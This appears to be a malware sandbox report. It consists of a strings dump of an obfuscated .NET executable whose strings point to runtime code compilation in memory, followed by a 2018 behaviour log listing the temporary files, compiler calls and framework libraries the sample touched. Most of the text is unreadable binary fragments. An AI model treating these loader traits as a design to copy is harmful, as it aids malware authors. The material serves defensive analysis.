07Zs
8(p/
<1IzYe
y*p6
n{#W
LICz9S
v(
?-l/2
E;'}
9mMTS
@.reloc
_tyo
|2eq
RE `
1ms
70Ak
uAgj
g J&
)1R|
S 3)5
cZH3i#k
"]+'
]%CT
?;<7"!&
?#'@
]b6K
6IBxH
HVJ-
5}M,:
"<rJ
tZ8%
e= ;
iYdBw
&7*n
8/ $i
6WK3
1D4R
Kv3 n
7-@s#
7w kd
~?`i
hT$x
=l28(
3 83
;5n747
ea J
6:=:7&
bA4`
IMu:+_/
"zkin-.E
I"~2S
ozst
u>8ZQ
[sZF
5:W Q
<&Z;@
}V|`
fX>~
DAY n
zM a
96|l
]Fx=r<
I] Je
cU{F`
g~ *
:fUt
2&ooi
Um9g
^f`&
,O;j
U})+
%Hq+
hu|za
Mw&.
(IDAT
Qk+
X" l
^zs
ah"4
\J>W
\Y%@
,@Qsj
t5z}I
jY.NS
@*Z
W`>:
v1A$/
LXS>
6_r^h/
` h XC
0C@{
6TB*
u4,I6E
,\lr
^3R3X
BKEi
MmgJ
c_f,
\> -T8
8:a)
+"\*
U)D1_
@ 4@
"R\{
get_CompiledAssembly
OJ.%Y
b6oX
OELZ
"8#y
ZmFM
+s@sf3U
!yXb"
2&8~;
k55h
,JV<
RuntimeCompatibilityAttribute
p`f~
NCS9
FM
KV(I&
T3,m
'tsiE
[w)x
8oe{
KfbBB
XXr:
-DtL
9|%%
<;5N
4g[y
xSs;
#[qd
j9Ow5
RZ1?x
g339
"7^\
h^=Z
'ibL4
N6o]
^_=u
svU?
tG)i,'H
fbxn
L (
set_GenerateExecutable
hw=QWc
uahH
*c%o
ToCharArray
>fr
ylq
px0X
#siW&C
Dy<e
< ;j
GQgO
<) ~w
Tf]s
0 (C
U}qw
@KfF
3l)z
N_k-L
8T%)
=8 9%
x'l&
Zq
cH]{
Ra m38
o%f?Jn,
\}IL!
7bRz
/Z+#
/t=6
edW/%<[
CQ*gu
T~6
m]
]Giw
*@FGf
u~}=
q9f
%|SI7:a
LE (
A4t0
^MyH
LyDk
/]2wM
w42[
I<01
rQGm
t6F
dZ9qCr3
C,Rb
X:uaS
#)(5M
1;>f
wk}8px
&H.s
SpK
Gn(
5{;?
%W97
|G2XO
[=w^
4 3&hk
O;8`
yM81G
Ugn!
IgV{
' w|O
BF^;|
d29s
sj t}
Az:S
:<)(
9T\'=
U{8d
Ee"?=
5C;3
+H1c#a
t;"~
;*kj
SXDQ
x8vS
CS}c'
c!EB
dYw^ (
$ ]9
get_ReferencedAssemblies
z=F]
iaZ^
h*TS
e[oKF
bUzWL
)]Qe
Lvnu
Ey ]o
kC7h
:BW}
_p@L
_/Q+|
JDg
3e2{y
.;?H
Hca{H
BmOfv
>7N2
!dZpq`
&xFzE
l Uz
AI*D
)0Ay
/A-|
! V@
`^XR>
w t]
/@3,\
m"*a
zmcQ
uax|F
M<UU
,.*K
Eil+
=L]7
VdBB
zD!b
HDs"
Km6L
xLgZ
n|7ky
~& P
arAW
8@y"Q
Xt'p
DQ_
bsb7q
K,}:
Gmg5
V+Zqn
< 1U
eX&I%
O{)&
NyWj
4sk|/DC
KR4qv
Y)(
>-Ff
m@jVj
x8!c
g#!W
XAEe
3!!b
2++n
|g^e3p
ilwS
yR2
!\1)
MoT*
[yyL
g %H
jxIM
9ktN
}f5O
;C>It+
b +]
~I?)
xD6SQ
+DMv%aX
= hd
L<~T
sEpu
"kd}
(l*0V4
sHm-
A#~k
I0 <h[bK
l\z&
1edl
Kc6i
iKlO
i{xnV
R@zN
*$IdS
$w>5p
BrnEwe
307.
***
Z M4B
| d
~BM1
m|B@
MQ=%$<
OZ.]
=kL/
&T]$
=k/A
bkX3R
A)aiwO
&AO;
MlU&
h<Yt@R;S
:]ye
HV Bi
i^s
Bz1[
!u&{
G1C#Z
+)Df
7O.T~
kRy<h
J\3v"C@
5A"Cb
F3n1-
}P^n
? xd
B(6_
q%*K
k)"^@
B;
"@&F
HIIo
eB~)
2\U,
[.nJ
q2'{
o^;r <
[f-twhE
^~zho
>M,l[c*9R
f1c,
_Z-;
S|-c0
\w0,V
Hnm];C
7`S9
(hSZ6
'3- z=K
4P@-iH
sG3M
R re
gAMA
5 p P
,x|a
er|v
pn1wKJu
jNt>X
,iw?_u
mErK%
MGNF
|*7|}
:Bv0G
(\p_
_ QV
0'$on
)ZPM%
on|f
Y~Z'"
N%9gw
5[S
LDsZ
Y7<u
w:;]
TwRp
HX46
{nyX
mscorlib
0f%Jj
mp%7
fH| (E]f
khZ
#:+X
iqifm7O7s*
W}]^
YKv
LAmb{L/
$ /@
MrKE H
7~TzU
,[qyf
efoM
~Ow+
6Kq Vg
set_IncludeDebugInformation
)0$(##
YiRIeb
.Y>%>
[|)\
!.0|
jN>6b
mZ3-
*ZA=
Yy%<G
5 }E
:#!=
xdZ{
'S2Qj!
Y;<R
h41%*
A(
System.Reflection
Tu(yTI^
t@x(
!; $
N %r)M
%h.X
IXa#|}s.
4z=[
B r`
|UBS
{?ul
OoI`U
35.%
hDbz
3m9c
]p{$
^^kK4
}]Im
Ft !
Z|j`
Z[-J
+C$7
ipUO
,+@:
yT 3>*
xd d
ILx/
J<6i
`+3 W
v[F'
cjnT
h}vDn
D]"P
HsjM
R6!p
z;(l
[o<x
[@O
GC[7
trO , ~[B
(O]V
&c,&
LHHu
_$ mdD;{
;#h_
9)U>;
g;n
5#>mVwN
(LA4g
z&1q
!eR
f03"2Y
u07Y
F14~+
iK&>
f|yR
$zT[
' kRJ
TO(d?
)S x
Hmm
Y7X-
)}zO
kqCI
@a%0U
string_0
O:}P
(*W)&
more
8u0E}C
U_Z.
@17%X
M3^j
Bd B
s:-l 5
W<^|f;
*#{Q
KXD0!
Oq{]
c=O= !'Gs
?l8r
p~06r
^.|~
] !mH
_z./b
^G{_
&b
NIY7
5)1X
5n5RC
8[tj
UhT?}a
zIg`
W".N v
E m!
<O|&
p,Vj
&y?r
+SCz}
D u_
d@RV
~_Y@dn
xbv+
53J7
<7O=R
;M?{
dQtXs
Vbz :
f%,XK
_Z|y@3
dh<H
Ay~aEJ
hJNz
Srd0
TJg+
x/|;
>JE
'5F;.
"6&W
6 ;E
=wvm"}
"q>d~g0
$/\f
kq8b
$LQ7
) (),
{pz
vI l
eq-"6
}EqV
mscoree.dll
!This program cannot be run in DOS mode. $
9&Uz
B&X?
c% B
bhDq
'-hN
> i/
i-Pp
"B;H%J*
On$H
/08;
J ES
(qQIc~}n
R(Lq
PA<(A^
vwp3
^dAV
rA@ i
T[3`([
"3x8
E kkn
WIfn
one
:J_/
1AUE[5*>"
N$CHFm
~J "
}4tK
" 3|0z
set_GenerateInMemory
.3vS
vm}p
HmmU
kF>
)d H*j
=A'M./
ry,qAs
%Czo
KqOwN
h(H5
OaY)
_8x^
eM'tC
2h`/
JdCDd
'%fj
!Y)a
A J4#
JA*C
!1.7'=
$c%+
01 1
<)4 K
<|es
_M`v
]A#
OF>-q
.r7\
t\f>j:"}o
K wcg9
l&h}
@E,M$C
tB&P
m>E/
ld[%[
|x~)
kAV`
oPP*;3
\v>nC J-
SS;y
v+,G
;?j1
zN&o
>\e^
Dz9(
z \*
8`&5
{ c
_^]l
h?"w
,Drk
reyP1
l@V|v
t{HS
"e 7
vPmV
+e5)
L~/C6m
&D\
&ni=&
f*\KQ
n;S2
ND
:@a8
&fdr
'C("Pm
System.Collections.Specialized
_itE9
&Ml0B%
~\#uG
A*T(W{k
tM-6BM
*Da3
k;tDF
=pG-
f!.tw
AVN5
7$6YL
pTmC
hWGA=
{s_)
8jI
KvOkF
9}%>
NQ2P
{jy*C
@Hm-
nhIt
kHE!
_fy\
<,5*PQ
+:+
LkF
0&zYH
g!*J
c,r.^
Tq 8UJ
B5K)
<=Yq|
`?Aw
,j&)
#"-1"z
_Oa
T|qy
{/NI
s_~t
Nxy\
SE)$
}36P
MPX
_|hF?X
CXNz
<H[J
|{
/m//
Q<,M)Gf
Pz]4
c}*(
]+XQU#
sK!q
JY./
v)zK
s2.(
3m&TO
zzrB
c=dc
V|XR
>Xs
*!mM
\D E
/i.J
i2pq+
>=zr
\oKW
K02
nE!#
&h-(
5TvI
F;dVm
BjkC
\}T
wS.,
j:y&
]Pw,
@BEC;
a$K#S@^
;j};
_wa}
O=B7
P$f"
/ .'
(y)Q
$V_{
ayWb
( pu
*(\i
.`EM
.B:&
m[{
}N !
J kX!
>TA3f=
u4^mz
B.g?
HwKOwp
(#/'
MethodInfo
b;,h
P.K|#
hT[=>
(4%13'9
D?@aQ
|@!ugW
CompilationRelaxationsAttribute
z!<bY
$G5j
QZ a
NKxc
Hv3q }
TZ\nG=
Tnn7
~2W~A
KoN(
[ Jr/
|<5@
m1/%
CaGz
8L]\
>n;]
\BTGZ
@`/; y f
yoH O
Y9$/w
n/8"
u6<5
aS&ca
d$b"
G8sxG
zc\H
i``Vx
I;51\
%v
ZrbS
A"QR
H\GU2
a >I
#N_;
VeHy
l)/ J7b
+A Op
s~
+rG -
N-m%0
0On"Z
Ip95
F<eP
ex-c
;6Uf
O!;L-
please
cT6*
&]E2
:4CS
kEU>
;Kw{
U13#Y;
]$4M"
YCJI
\s&(Fe
^R~K
'5$+
$e3b@*
ltH<
$x6V
q<2
9d5@
C rX
YVRG
Pr/
.'/bihjh
*BD
65)b
rg.PV
ti.\N
~'tJ
F_g0z
2[#.;#
pW <
JFpX
SvI\"
}`Md
;JKV
QeP\(.
~~Y}=
$0+vd
s
9t5t
+; b
b`Bc
S
d79r
{)jc!O
f\d*p
^vu6+'_
}<>&,
KbZ&
g$Ol
O1qV0
AL%^w
DL *
kCEk
Gc7n
RS
6Uw_
9%/%
m05I^
]qT|=2
lU!K
W}.-
AYCL@{P t
CSharpCodeProvider
B JY0e~
JMv%
6+Ky
<EO>
-nF
~N'
4V*
bq^M
SFbZ
` Lx
=&_"
SIoB
-/(S
Fm{q
2Bf:
upO7
'9ch
_`v,gC
$c@>
[}^u
$zZL
snw{
s5y$
' E
bLOz
6QbqW
/yu;P
xy4
v =)p
jfT0
q8,"
l~x!
IsW!
:~>A
f<O
=8l
c@!8(J)A
c31@
@ZX|
B|vG
;/.\
xZ.]%
x^u
System.Text
= ]g8
%IH
LZIN
FBEN
iv"{}
k1WJ
WGCW
gwG}
0kYb
qrGjkI@
2v2[
]APB
z@!0
}qQ:
=Mn=
r~Jo
^ MA
{pQ-T
azFr:
1F [
WmRY#KZ
L!_y
|>[E
Z\ K~
%orZ^9
P"W4
/xNc
V[9u,\
")Df
O-_ds
>IaN
S?\eK
/hD"
lNM:
)t0
QR
=GN+
_&0q
%WF?F:
p `Q
;F'#!X
Sw& p
@0C<
unfY
. Tq
4$jn=L
dPq}T
>r/Sk
5V(V
naZz
tFDU
y$@,T
e U|
q!NT
xftG
|2MC
-+4[
X1 y
R:!?H
ML$u
Dl?;
f3A,H$2@
Ay@h
NTb]S
')|5
r,$Qb
c+Nn
uo5
CJA!
_a2,>E^x
ycL=
yQhS/
d`,K
wLPz{
R>-]0 :l
;&#%
)N#L;*
[^m>)
-7'AF
,yM0Efk
4J'4
4T"J
NXh_
A"_@:
?bK
jrzx
=cFM
.,8r
_CorExeMain
"w@p
o#O%
W>,9=
nn/~
;YBc
0+mh
:g.o!i
7`^5
^d!
4H*L
T>e!V
~q=2
$UK2#
'f~@
ly+C
DebuggingModes
(ZV1{V
}TSp
O0> {X
6_|^
XG:d
p#B3
eRI'z
@6}R
8H;~
m o
:Vu}
sYG!
cr 8
Stgu
?>tF
l/$j|
5RIIu
kySyg
"c<a
IviR0
t9c!
CaaI
pzF&
thG2
!$CH
j6XK
e9T&YI
^:\#
S&#'
L#;*
pH4U
Z9O]
cMO(n
O05K
y\h
ufd<
d36h
vj[#
O2Uw^P
$0#Q
CompilerParameters
& rt
1Re!
J,|C
j,*z
-qpI
+twA
VA7&?|P
A"F)
TN@GI
OEdV
9[w:
k {&
ipNm6
bIBE)0%U
@ XI
nKEs
r{
K" ,
7?L3zrb
7o[
8a13
&5t:x'
u<%Y
t2
iS[;
b1V@(
&~@:
=58k
+j/8I
iQm[
"lH!
_O[
DebuggableAttribute
k@;u
QNB)
R4V
%EnED
= Es
?LbHX+!c
_/}G`Jo
pqLK
Reverse
I\k6
mqw2
IDAT5D\
X~W
:/~<
a|+w
Z/:yT7
0 J#^) `
#-2i
qy*`
:Qrs
YqX)
`zeYl
e],ZHX
sv?t
1|K1
PS3?z
cE*|
<}Vby
%ca=
n dw|
U>_)
}D- z
90RO
6.kTa^
J5L$
_j|#
r?H?'
6ko
b_K7
H_-y
6(nvjV
[^=n
*(I d
Nh*#
,>1kB
Object
XzuWS
).2
,? Z
S\R@
+e]b
rn3qTl
] =
Buk.
P/+S
fY O{>
-7bT
U6eO]
hNm
BtGm
LTYB
uD\w2e
;?G
a@J
[()g
?.r?9
gW)
$79 YB
?s:^
jj2
v.ZS
.')!
DdlvB7wF9H2w7TrM.Program.exe
s *-6
.Uj_
{&]!H
{` SZ<++G7
,?%}
gpA,
xA?
c>*
qhL?
-402
//Tih
c[p2,A
ic($CH
$syIMI]
0.2 g&i
6-qO
S`I"
nl,;
l Y=
aNqO+
!;9;
(KPZn.L
rHE<'N^s
SR<K
*ofF
SeuF
ty8(
/vzL
Rm-|
MFon
$8>
vK=Y
>VK8
_;>J<6
g,Z:
Hv5tY;'
-R,d
$/t|Xu;uP
"zb1Y
hfYY0aE
<_*&
c)A"
9A|9
N<-!
uCaap
SV<=
(uy2
b D&
9 yQ_T
=vH
HH_HjA}
sRGB
/!w'
"j<0
$,i;
!$ ~Oz
8U;,
x "
v"
#0Ed&}Q5
%] t
Exit
NzDM
y;q
{ /.Od
@ 4%
x6to
YW q
'9&/
`xI)
H4 l
2Vy[
6x|o
hFz
tsO!C$
<w-)
ACWB
7/Yg
H)R!b17
HZ"
zyB]
zNbO
Feuz
9)t]
BDR)
b%(5
a s*
6),]>
SYb"
nU1b
: <n
%zax
^a OR
u*1iK
[t^|
] Ia
<8+T
6LP0
"~Yw
>y.0
@ `1
=a:d$
tY(}
gm+`
Qgj^
;uy{j
&5F%Cm
-=:s~
Party
n.p
ns;T
sNO9
<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly>
sQ&W
.G"
,UL
m^R+E
: ,.!E
sx} |
{"Ao
1lU8@=e{
#F*v
AGa
+3^Wb
*BSJB
S(9.(
qJ Hm
+4"
x|o0eh
m{3./
(\LQ
!H1y#
J[M`
]Ov%~
'N<:5
` jS
KH {
quir %E
BT$}J
,.Hw=|=E
#f~
@'P
o?g 0
~42!a21
;T- {
@+_yk
0 . 16
Kq;3
T)xH
9HLp
>b'h
a9[qK
!ko@
zyw`
5"Jh02
')$M'
1 i)+
y1>zI
[~@&
Op]HA
J E
?CpGE
RhnD
m%<h
fPU~
m=,kg
i#r
.5DS
|N"J
a{xl
t\y
w0qct
ozBeK
kHw~/
' P511
d`sm:
kOf(
Aj{
&qtoG
Md5;
5^it
F1Nl&~I'R
] ?nB
)7 dX
k?pC
5wA
pZ6c
m=*
-d}[
T^{4
&Y.O}]
Tl<
>1ya
5&e_
p0@'hEb
v)[#
b{!d+a!
Oyg?6
(B/ - u
]?mq
NO}L
kNbb
-Ava
VL8?
K 1|>
#(JWn
+mM{SCZ
q$Ds
YM;7w
VA;u6
*|2C
(19+C
vzkE
S+'8^^
|yae
}wM;i
=Y#?p
v9Yc
,[//
6IOm
(C<'
_T,&
$pviD
JB<
wG5rj
- V
!`;n$v
6qQ^
-+{ :
:P%c
<&<x)
Yz;rD
op""t
|^CU
\DsR
8zyE
;cg v2
n(:b
:qi*G_
WF^a@nN
/ @=
Lk[A
2+%
Be|w
Sz$yq
cXrh
c,>
2Q+ @
r(Yq
rIRJ
4.&q
Y*4(
7XTF
EPWZ$
@.G
*0OY
OperationalStatus
I$H/
)(AY
<:&Z
tk4I
uk)p
1E'n
[sQS!
:7$C
U _XsJ
of;'
u8f);
5A.(4
$b"
m=Dk
tQI3^ fg7a
Br!.Y%
n |/
[16_
('k<
0e.e2(
eLI>
w{>!w|
'"2~
\[Yy
Q5BaU
GD^'
p:b7
<wYa\
V|rXi
w_eH
x;&)
uC=
Y +dV
e;+w
#&-&8/
TG/E`
75>=y
R#0S
|Us$F
ZI![
1U\*
]-|w
P9%w
ypcY
PropertyCollection
> %%%
I(2xc
#^VK
vk79
@,hg4
z>=oYGZ#s
3` |
$ bf
"@9D
V^"E
tfxb
W<;}E
\?<X
ix$s
\^LC
-\m#
tgXI
'7'Z
x;08n
IDAT
.{-
k"ska
XsIa
UW_b
! dy'
99ukz
%reH
Math
!t9c5(TL
45>h
fVL5AW
\,~/
{>3`7g
U`LG
$c]%
&+b
0~rmb_
;9^
=c\g
gWL>
cdIVX
System.Runtime.CompilerServices
725Y
\/n'{
Um\+
)ejv%
0
df*L
\3fQi
wB]"
!#I~
((?
ISFe
!Q3 G
bF#(
:{S&
hBO@
IEND
D_Q~7;W
"\\?
eZ{:3%
ez&1
U|vQ2
obM@'E
zZcA
3;~u
1FAD
@V fY
$H?ml
3^,.
set_CompilerOptions
LV!g
r$dK*9
LY8$
/?gY
1NUM
k49$
k`Tu
(Uy
%mz1Q
{UQB>
Y<y5
S,u1
0LqG
#b&|
l3iN
Y)bF
uSa{
yN^d
>"
vP1x
JLNV
7^7m
pkB(
*~;0
){ k
]QAs
n~3^1
f>is
+1(8
KH2j@
t,v8
b|d]
"u5
d '~
J^ow
.iNB5@
hw`Y
VrQXj
" `m
! i/j#`2
L >U
3c~S&
'&i?)G
qz1w
Z6XC
r<(
y^mO
0|+'d
F4;w!
Rsk;
[ Qc
u&|L
D.=&
gyHt
O*q|A"
<Module>
H8peG
`!RH
'R s
in=cLP%
zYpv
RAF}
=Pg&
EwHAq
5rmp
Q
w/:6
-M3B
x8S=
D`l^
#fo!
ePqryQ
=<v+
8'2\*e6
\ jMJU"
Ob#C
f;wq
'6 |o
DX ,
p]cv
Wp<U3
NoZqD
rf"I^
6EV*
zn+I
. (Xy
z3?2
.8^1
BY1
a9 B
z`J=
,$M 6jk
ZB;A
{_~tN!
>Q#B
yN*
x!_
7-e@C
i(K?Z
&PC
$; 2
%Kcy}b
7m+J>;?
>\J_
7wh*
"GpG
<I+s7(6
#GUID
$fpXq
y\m9%
i@|%
:_B}
drink
,#`u
@7Ag
=JL%
w=g1
DdlvB7wF9H2w7TrM.Program
O>^h
h>q.J
lMn8
r"AB
/=]
RC/?
*%.f
!d\q
VU+o(<
b8H@
pX3~+
W\%{
Wof6
nth
4Gy|
A.K~
"dy<
PB7!
#O&]
9^"d
@^FD
o\lL
T"m9
Q+%dU+
*uaa|
dk{S
xpBYfS}
#B0Q
E R >+
t,@+<
D1$^RY
a M1
?! !
@<{Y
AqGF
iK F
1dgXC~
Id@f}};
QZJOj
2V%Zf
(NM 4
RPla
w4_C
IDesignerSerializationProvider
lR3^
"2]P_XR
g0dH
%p;Y?
E*_6
<GY'
\n`QR
Encoding
2qE`/T
'd&/?I
.W7R
-J6J
+O.v
c0s,
7nLG
EmIf+}
g='1
T{+w
R[+K
~" q
0 PK
Ajk#
kh[}
Gv<'
L~<L
bv/x
]q_k
&T<r
5-%7
d4Q#
MW1I
s_GK
S2VR
,5u1
1J`9
kNn3
g?.
4hnX
p)?u
7E
[G*j
'H}#
A:V(
pAs
Ej|! b
.}7V
%dn.
GG2 kL
s`J|]@*
sI<
G/z.
Replace
XH$Y
t)_bE]
}T.])
Tq 7
&*3
v{3H[L
=S<g~
LK~"
}3tg
,Z|Dr '
J\Rl
D|_p
a)f4
OA c P
"yN
v_F\H
2Q:i Xf
]d&;>
x60V
j^zQt
Q8 @!
Vbv0
kvBF
hL2Ps
j2l|uR
u26V
c2)W-4
d{>#p
,|As
C6])
csmy$
I*87t
/5dBAwST
Zb#
ucZR
]&=P
};DD
>JDY
` w{
&+EI
)[}x
xuTd
;$p-i
|!f!
uGgy
!#.}
&_>=y
r> d'7
8m&G
AvP+
r,_Q
3Q d
zNe@
nVwtLtd
FP"e
rT
unNF
*N(
W'G}
8fA^
!_)u|
_ E$
<=?
jq;}!6
Op_>Q
3W}k
9s@5JGI
URjE^
_7"a
m{Ec
L"u
]g /
B^Ol
xJ7B
M_y2
Mc*p
G9z
N& m
[v>.
ZL2+
?*X|U
,$ P
lt^7
M&*%
:o;V
=zK_
qi]cH
2G]+
, T;
1^J6
NndNl
Y(Q10#
Dfz_F
i[[f~
P:/B
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 09:24:08 2018-04-27 09:26:58 170

9 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 09:24:08 2018-04-27 09:26:58 170

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.config
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\DdlvB7wF9H20c8d1789#\*
C:\Users\Seven01\AppData\Local\Temp\vbc7.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
